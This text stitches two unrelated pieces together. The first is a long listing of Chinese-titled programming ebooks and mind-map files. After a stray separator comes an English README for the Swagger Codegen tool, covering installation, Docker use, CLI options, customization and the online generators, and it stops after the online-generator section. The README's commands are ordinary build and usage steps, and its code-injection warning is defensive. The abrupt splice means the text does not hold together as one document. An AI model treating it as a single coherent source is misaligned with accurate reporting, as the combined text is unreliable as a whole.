* 十个 JavaScript 中易犯的小错误.epub
* 只有程序员看的懂面试圣经|如何拿下编程面试.epub
* 命令行的艺术.epub
* 响应式图片101.epub
* 响应式设计快速指南.epub
* 图像处理算法.epub
* 图解 Flux.epub
* 图解 Monad.epub
* 基于Qt的词典开发.epub
* 大型網站架構學習筆記.epub
* 大数据开源框架.epub
* 大数据管理系统LAXCUS.epub
* 奇舞周刊.epub
* 好说 haoshuo.epub
* 安全工程师面经.epub
* 安卓项目实践.epub
* 完全用 GNU-Linux 工作.epub
* 小Printf的编程故事(更新中).epub
* 小巫CSDN博客客户端开发教程.mobi
* 小细节大体验.epub
* 常见排序算法.epub
* 建设全功能团队.epub
* 开源数学软件.epub
* 开源物联网系统设计.epub
* 开源软件架构.epub
* 强迫症的 Mac 设置指南.epub
* 微博开放平台接入tips.epub
* 微博推荐架构的演进.epub
* 成长.epub
* 我的后端开发书架2015 2.0版.epub
* 手淘 H5 性能最佳实践.epub
* 打造android ORM框架.epub
* 技术选型:喷子、胆量和产品意识.epub
* 把《The Swift Programming Language》读薄.epub
* 把《把时间当作朋友》读薄.epub
* 把《编程珠玑》读薄.epub
* 持续集成(第二版).epub
* 探索Lua5.2内部实现.epub
* 接口测试.epub
* 掰扯数据结构.epub
* 描述、发现以及档案:进入Web API的下一阶段.epub
* 敏捷文档你需要知道的.epub
* 数据库内核月报.epub
* 数据的秘密.epub
* 数据结构.epub
* 数据结构与算法-leetcode-lintcode题解.epub
* 新亿CMS完全手册.epub
* 新兵训练营系列课程.epub
* 日志:每个软件工程师都应该知道的有关实时数据的统一抽象.epub
* 时间序列数据库的秘密.epub
* 智酷分析精选.epub
* 最完整的Docker聖經 - Docker原理圖解及全環境安裝.epub
* 最详细的 Vi 编辑器使用指南.epub
* 机器学习实战笔记.epub
* 来自HeroKu的HTTP API 设计指南(中文版).epub
* 构建需求响应式亿级商品详情页.epub
* 架构之重构的12条军规.epub
* 架构师(2015年6月).epub
* 正则表达式简明参考.epub
* 比较全面的MySQL优化参考.epub
* 沉浸式学 Git.epub
* 深入浅出Docker.epub
* 深入浅出ES6.epub
* 深入浅出Mesos.epub
* 深入浅出Nodejs读书笔记.epub
* 深入浅出React.epub
* 深入理解javascript原型和闭包.epub
* 深入理解JavaScript系列.epub
* 深入理解PHP内核.epub
* 现代密码学实践指南[2015年].epub
* 理解Linux进程.epub
* 理解OAuth 2.0.epub
* 用Swift做个游戏.epub
* 用爱一起画git.epub
* 白板编程浅谈——Why, What, How.epub
* 看云新手入门.epub
* 知道创宇研发技能表v3.0.epub
* 码农增刊·硅谷之火.epub
* 禅与 Objective-C 编程艺术.epub
* 移动H5前端性能优化指南.epub
* 移动开发精华阅读.epub
* 移动端文字与排版设计的六个原则.epub
* 移动终端开发必备知识.epub
* 移动阅读时代“长文章”生存调查:谁受欢迎?.epub
* 程序员应知.epub
* 程序员必读书单 1.0.epub
* 程序员的自我修养.epub
* 程序员聊人生(试读版).epub
* 程序员英语单词册.epub
* 程序江湖.epub
* 程序设计训练.epub
* 笨办法学Prolog.epub
* 笨方法學 Ruby.epub
* 简道云使用手册.epub
* 算法与数据结构.epub
* 算法积累.epub
* 精益技术简历之道——改善技术简历的47条原则.epub
* 糗事百科(精编版).epub
* 编程入门指南.epub
* 编程思想之多线程与多进程.epub
* 编程的智慧.epub
* 编程笔记 By billryan.epub
* 网络爬虫系列.epub
* 网页性能管理详解.epub
* 翻译漫谈——怎样翻译更地道.epub
* 背包问题九讲.epub
* 腾讯alloyteam团队前端代码规范.epub
* 菜鸟学SSH.mobi
* 蓝色铁骑.epub
* 解析 Android 架构设计原则.epub
* 让web app更快的HTML5最佳实践.epub
* 设计模式.epub
* 设计模式与系统架构.epub
* 超实用的IOS 9人机界面指南.epub
* 趣味算法设计.epub
* 跟着ym学习Android5.0.epub
* 踟蹰MySQL.epub
* 轻松python-文本专题.epub
* 轻松把玩HttpClient.epub
* 轻松搞定RabbitMQ.epub
* 重拾 CSS 的乐趣.epub
* 零日漏洞:震网病毒全揭秘.epub
* 面向对象设计模式.epub
* 面向指针编程.epub
* 飞鸟集.epub
* 高效运维最佳实践.epub
* 高斯模糊的算法.epub
ACCESS CONTROL.xmind
Android笔记.xmind
App Store最新审核指南.xmind
CMMI.CHM
DBA.xmind
Functional Interfaces in Java.pdf
HTML5.xmind
IOAM.xmind
Java.png
Java.xmind
LR 227个问题.CHM
OKR工作法:谷歌、领英等顶级公司的高绩效秘籍-克里斯蒂娜·沃特克.pdf
OWASP-2017.png
SEO百科.xmind
SEO相关.xmind
Type.png
VBS教程.chm
VB初哥教学.chm
WP-Understanding Java Garbage Collection.pdf
Web前端技能树.xmind
big-data.xmind
cloudComputing.xmind
dev-lang-Go.xmind
dev-lang-total.xmind
frontEnd.xmind
iOS知识点.xmind
iOS证书&打包&上架.xmind
java知识结构图.jpg
micro-service.xmind
security.xmind
skill.jpg
vc_sx.chm
乔梁-google软件测试之道-笔记.xmind
代码之髓.xmind
信息安全工作.xmind
安全结构分解.xmind
平台_效率平台研发.xmind
我眼中的测试.xmind
未来是湿的:无组织的组织力量-克莱•舍基.pdf
正则表达式.xmind
测试新手学习宝典.chm
測試全景.gif
职能地图-Android.xmind
职能地图-Java.xmind
职能地图-个人 v2.0 .xmind
职能地图-个人.xmind
规范.xmind
计算机安全使用.xmind
计算机安全使用第三级别.png
软件安全测试经典定义.xmind
软件测试.xmind
软考-信息系统项目管理师.xmind
软考-系统分析师.xmind
运维工作.xmind
阿里云盾.xmind
阿里云网关的使用和配置.xmind
需要出的安全规范0.01.xmind
前端规范计划.xmind
質量和效率提升.xmind
|
# Swagger Code Generator
[![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)
[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)
:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:
:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:
:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:
:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:
## Overview
This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:
- **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, Node)
- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)
- **API documentation generators**: **HTML**, **Confluence Wiki**
- **Others**: **JMeter**
Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.
# Table of contents
- [Swagger Code Generator](#swagger-code-generator)
- [Overview](#overview)
- [Table of Contents](#table-of-contents)
- Installation
- [Compatibility](#compatibility)
- [Prerequisites](#prerequisites)
- [OS X Users](#os-x-users)
- [Building](#building)
- [Docker](#docker)
- [Build and run](#build-and-run-using-docker)
- [Run docker in Vagrant](#run-docker-in-vagrant)
- [Public Docker image](#public-docker-image)
- [Homebrew](#homebrew)
- [Getting Started](#getting-started)
- Generators
- [To generate a sample client library](#to-generate-a-sample-client-library)
- [Generating libraries from your server](#generating-libraries-from-your-server)
- [Modifying the client library format](#modifying-the-client-library-format)
- [Making your own codegen modules](#making-your-own-codegen-modules)
- [Where is Javascript???](#where-is-javascript)
- [Generating a client from local files](#generating-a-client-from-local-files)
- [Customizing the generator](#customizing-the-generator)
- [Validating your OpenAPI Spec](#validating-your-openapi-spec)
- [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)
- [Generating static html api documentation](#generating-static-html-api-documentation)
- [To build a server stub](#to-build-a-server-stub)
- [To build the codegen library](#to-build-the-codegen-library)
- [Workflow Integration](#workflow-integration)
- [Github Integration](#github-integration)
- [Online Generators](#online-generators)
- [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)
- [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)
- [Swagger Codegen Core Team](#swagger-codegen-core-team)
- [Swagger Codegen Evangelist](#swagger-codegen-evangelist)
- [License](#license)
## Compatibility
The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:
Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes
-------------------------- | ------------ | -------------------------- | -----
2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes
2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes
2.2.2 (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)
2.2.1 | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)
2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)
2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)
1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)
### Prerequisites
If you're looking for the latest stable version, you can grab it directly from Sonatype.org (Java 7 runtime at a minimum):
```
wget https://oss.sonatype.org/content/repositories/releases/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar
java -jar swagger-codegen-cli.jar help
```
On a mac, it's even easier with `brew`:
```
brew install swagger-codegen
```
To build from source, you need the following installed and available in your $PATH:
* [Java 7 or 8](http://java.oracle.com)
* [Apache maven 3.3.3 or greater](http://maven.apache.org/)
#### OS X Users
Don't forget to install Java 7 or 8. You probably have 1.6.
Export JAVA_HOME in order to use the supported Java version:
```
export JAVA_HOME=`/usr/libexec/java_home -v 1.8`
export PATH=${JAVA_HOME}/bin:$PATH
```
### Building
After cloning the project, you can build it from source with this command:
```
mvn clean package
```
### Homebrew
To install, run `brew install swagger-codegen`
Here is an example usage:
```
swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/
```
### Docker
#### Development in docker
You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`
in the docker container. It also maps `~/.m2/repository` to the appropriate container location.
To execute `mvn package`:
```
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
./run-in-docker.sh mvn package
```
Build artifacts are now accessible in your working directory.
Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:
```
./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli
./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli
./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client
./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \
-l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore
```
#### Run Docker in Vagrant
Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).
```
git clone http://github.com/swagger-api/swagger-codegen.git
cd swagger-codegen
vagrant up
vagrant ssh
cd /vagrant
./run-in-docker.sh mvn package
```
#### Public Pre-built Docker images
- https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)
- https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)
=======
##### Swagger Generator Docker Image
The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.
Example usage (note this assumes `jq` is installed for command line processing of JSON):
```
# Start container and save the container id
CID=$(docker run -d swaggerapi/swagger-generator)
# allow for startup
sleep 5
# Get the IP of the running container
GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)
# Execute an HTTP request and store the download link
RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"')
# Download the generated zip and redirect to a file
curl $RESULT > result.zip
# Shutdown the swagger generator image
docker stop $CID && docker rm $CID
```
In the example above, `result.zip` will contain the generated client.
##### Swagger Codegen Docker Image
The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.
To generate code with this image, you'll need to mount a local location as a volume.
Example:
```
docker run --rm -v ${PWD}:/local swagger-api/swagger-codegen generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l go \
-o /local/out/go
```
The generated code will be located under `./out/go` in the current directory.
## Getting Started
To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
mvn clean package
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l php \
-o /var/tmp/php_api_client
```
(if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`)
You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.1/swagger-codegen-cli-2.2.1.jar )
To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`
To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`
## Generators
### To generate a sample client library
You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:
```
./bin/java-petstore.sh
```
(On Windows, run `.\bin\windows\java-petstore.bat` instead)
This will run the generator with this command:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java
```
with a number of options. You can get the options with the `help generate` command:
```
NAME
swagger-codegen-cli generate - Generate code with chosen lang
SYNOPSIS
swagger-codegen-cli generate
[(-a <authorization> | --auth <authorization>)]
[--additional-properties <additional properties>]
[--api-package <api package>] [--artifact-id <artifact id>]
[--artifact-version <artifact version>]
[(-c <configuration file> | --config <configuration file>)]
[-D <system properties>] [--group-id <group id>]
(-i <spec file> | --input-spec <spec file>)
[--import-mappings <import mappings>]
[--instantiation-types <instantiation types>]
[--invoker-package <invoker package>]
(-l <language> | --lang <language>)
[--language-specific-primitives <language specific primitives>]
[--library <library>] [--model-package <model package>]
[(-o <output directory> | --output <output directory>)]
[(-s | --skip-overwrite)]
[(-t <template directory> | --template-dir <template directory>)]
[--type-mappings <type mappings>] [(-v | --verbose)]
OPTIONS
-a <authorization>, --auth <authorization>
adds authorization headers when fetching the swagger definitions
remotely. Pass in a URL-encoded string of name:header with a comma
separating multiple values
--additional-properties <additional properties>
sets additional properties that can be referenced by the mustache
templates in the format of name=value,name=value
--api-package <api package>
package for generated api classes
--artifact-id <artifact id>
artifactId in generated pom.xml
--artifact-version <artifact version>
artifact version in generated pom.xml
-c <configuration file>, --config <configuration file>
Path to json configuration file. File content should be in a json
format {"optionKey":"optionValue", "optionKey1":"optionValue1"...}
Supported options can be different for each language. Run
config-help -l {lang} command for language specific config options.
-D <system properties>
sets specified system properties in the format of
name=value,name=value
--group-id <group id>
groupId in generated pom.xml
-i <spec file>, --input-spec <spec file>
location of the swagger spec, as URL or file (required)
--import-mappings <import mappings>
specifies mappings between a given class and the import that should
be used for that class in the format of type=import,type=import
--instantiation-types <instantiation types>
sets instantiation type mappings in the format of
type=instantiatedType,type=instantiatedType.For example (in Java):
array=ArrayList,map=HashMap. In other words array types will get
instantiated as ArrayList in generated code.
--invoker-package <invoker package>
root package for generated code
-l <language>, --lang <language>
client language to generate (maybe class name in classpath,
required)
--language-specific-primitives <language specific primitives>
specifies additional language specific primitive types in the format
of type1,type2,type3,type3. For example:
String,boolean,Boolean,Double
--library <library>
library template (sub-template)
--model-package <model package>
package for generated models
-o <output directory>, --output <output directory>
where to write the generated files (current dir by default)
-s, --skip-overwrite
specifies if the existing files should be overwritten during the
generation.
-t <template directory>, --template-dir <template directory>
folder containing the template files
--type-mappings <type mappings>
sets mappings between swagger spec types and generated code types in
the format of swaggerType=generatedType,swaggerType=generatedType.
For example: array=List,map=Map,string=String
--reserved-words-mappings <import mappings>
specifies how a reserved name should be escaped to. Otherwise, the
default _<name> is used. For example id=identifier
-v, --verbose
verbose mode
```
You can then compile and run the client, as well as unit tests against it:
```
cd samples/client/petstore/java
mvn package
```
Other languages have petstore samples, too:
```
./bin/android-petstore.sh
./bin/java-petstore.sh
./bin/objc-petstore.sh
```
### Generating libraries from your server
It's just as easy--just use the `-i` flag to point to either a server or file.
### Modifying the client library format
Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own.
You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy.
### Making your own codegen modules
If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \
-o output/myLibrary -n myClientCodegen -p com.my.company.codegen
```
This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic.
You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such:
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
For Windows users, you will need to use `;` instead of `:` in the classpath, e.g.
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library:
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \
io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\
-i http://petstore.swagger.io/v2/swagger.json \
-o myClient
```
### Where is Javascript???
See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require
static code generation.
There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification.
:exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala.
### Generating a client from local files
If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument
to the code generator like this:
```
-i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json
```
Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane.
### Selective generation
You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output:
The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated:
```
# generate only models
java -Dmodels {opts}
# generate only apis
java -Dapis {opts}
# generate only supporting files
java -DsupportingFiles
# generate models and supporting files
java -Dmodels -DsupportingFiles
```
To control the specific files being generated, you can pass a CSV list of what you want:
```
# generate the User and Pet models only
-Dmodels=User,Pet
# generate the User model and the supportingFile `StringUtil.java`:
-Dmodels=User -DsupportingFiles=StringUtil.java
```
To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`.
These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`):
```
# generate only models (with tests and documentation)
java -Dmodels {opts}
# generate only models (with tests but no documentation)
java -Dmodels -DmodelDocs=false {opts}
# generate only User and Pet models (no tests and no documentation)
java -Dmodels=User,Pet -DmodelTests=false {opts}
# generate only apis (without tests)
java -Dapis -DapiTests=false {opts}
# generate only apis (modelTests option is ignored)
java -Dapis -DmodelTests=false {opts}
```
When using selective generation, _only_ the templates needed for the specific generation will be used.
### Ignore file format
Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with.
The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code.
Examples:
```
# Swagger Codegen Ignore
# Lines beginning with a # are comments
# This should match build.sh located anywhere.
build.sh
# Matches build.sh in the root
/build.sh
# Exclude all recursively
docs/**
# Explicitly allow files excluded by other rules
!docs/UserApi.md
# Recursively exclude directories named Api
# You can't negate files below this directory.
src/**/Api/
# When this file is nested under /Api (excluded above),
# this rule is ignored because parent directory is excluded by previous rule.
!src/**/PetApiTests.cs
# Exclude a single, nested file explicitly
src/IO.Swagger.Test/Model/AnimalFarmTests.cs
```
The `.swagger-codegen-ignore` file must exist in the root of the output directory.
### Customizing the generator
There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc:
```
$ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/
AbstractJavaJAXRSServerCodegen.java
AbstractTypeScriptClientCodegen.java
AkkaScalaClientCodegen.java
AndroidClientCodegen.java
AspNet5ServerCodegen.java
AspNetCoreServerCodegen.java
AsyncScalaClientCodegen.java
BashClientCodegen.java
CSharpClientCodegen.java
ClojureClientCodegen.java
CsharpDotNet2ClientCodegen.java
DartClientCodegen.java
FlashClientCodegen.java
FlaskConnexionCodegen.java
GoClientCodegen.java
HaskellServantCodegen.java
JMeterCodegen.java
JavaCXFServerCodegen.java
JavaClientCodegen.java
JavaInflectorServerCodegen.java
JavaJerseyServerCodegen.java
JavaResteasyServerCodegen.java
JavascriptClientCodegen.java
NodeJSServerCodegen.java
NancyFXServerCodegen
ObjcClientCodegen.java
PerlClientCodegen.java
PhpClientCodegen.java
PythonClientCodegen.java
Qt5CPPGenerator.java
RubyClientCodegen.java
ScalaClientCodegen.java
ScalatraServerCodegen.java
SilexServerCodegen.java
SinatraServerCodegen.java
SlimFrameworkServerCodegen.java
SpringMVCServerCodegen.java
StaticDocCodegen.java
StaticHtmlGenerator.java
SwaggerGenerator.java
SwaggerYamlGenerator.java
SwiftCodegen.java
TizenClientCodegen.java
TypeScriptAngularClientCodegen.java
TypeScriptNodeClientCodegen.java
```
Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values.
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java \
-c path/to/config.json
```
and `config.json` contains the following as an example:
```
{
"apiPackage" : "petstore"
}
```
Supported config options can be different per language. Running `config-help -l {lang}` will show available options.
**These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it)
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java
```
Output
```
CONFIG OPTIONS
modelPackage
package for generated models
apiPackage
package for generated api classes
sortParamsByRequiredFlag
Sort method arguments to place required parameters before optional parameters. Default: true
invokerPackage
root package for generated code
groupId
groupId in generated pom.xml
artifactId
artifactId in generated pom.xml
artifactVersion
artifact version in generated pom.xml
sourceFolder
source folder for generated code
localVariablePrefix
prefix for generated code members and local variables
serializableModel
boolean - toggle "implements Serializable" for generated models
library
library template (sub-template) to use:
jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2
jersey2 - HTTP client: Jersey client 2.6
feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3
okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1
retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0)
retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2)
```
Your config file for Java can look like
```json
{
"groupId":"com.my.company",
"artifactId":"MyClient",
"artifactVersion":"1.2.0",
"library":"feign"
}
```
For all the unspecified options default values will be used.
Another way to override default options is to extend the config class for the specific language.
To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java:
```java
package com.mycompany.swagger.codegen;
import io.swagger.codegen.languages.*;
public class MyObjcCodegen extends ObjcClientCodegen {
static {
PREFIX = "HELO";
}
}
```
and specify the `classname` when running the generator:
```
-l com.mycompany.swagger.codegen.MyObjcCodegen
```
Your subclass will now be loaded and overrides the `PREFIX` value in the superclass.
### Bringing your own models
Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell
the codegen what _not_ to create. When doing this, every location that references a specific model will
refer back to your classes. Note, this may not apply to all languages...
To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such:
```
--import-mappings Pet=my.models.MyPet
```
Or for multiple mappings:
```
Pet=my.models.MyPet,Order=my.models.MyOrder
```
### Validating your OpenAPI Spec
You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example:
http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json
### Generating dynamic html api documentation
To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation:
```
cd samples/dynamic-html/
npm install
node .
```
Which launches a node.js server so the AJAX calls have a place to go.
### Generating static html api documentation
To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem:
```
cd samples/html/
open index.html
```
### To build a server stub
Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information.
### To build the codegen library
This will create the swagger-codegen library from source.
```
mvn package
```
Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts
## Workflow integration
You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target.
## GitHub Integration
To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example:
1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/)
2) Generate the SDK
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \
--git-user-id "wing328" \
--git-repo-id "petstore-perl" \
--release-note "Github integration demo" \
-o /var/tmp/perl/petstore
```
3) Push the SDK to GitHub
```
cd /var/tmp/perl/petstore
/bin/sh ./git_push.sh
```
## Online generators
One can also generate API client or server using the online generators (https://generator.swagger.io)
For example, to generate Ruby API client, simply send the following HTTP request using curl:
```
curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby
```
Then you will receieve a JSON response with the URL to download the zipped code.
To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body:
```
{
"options": {},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
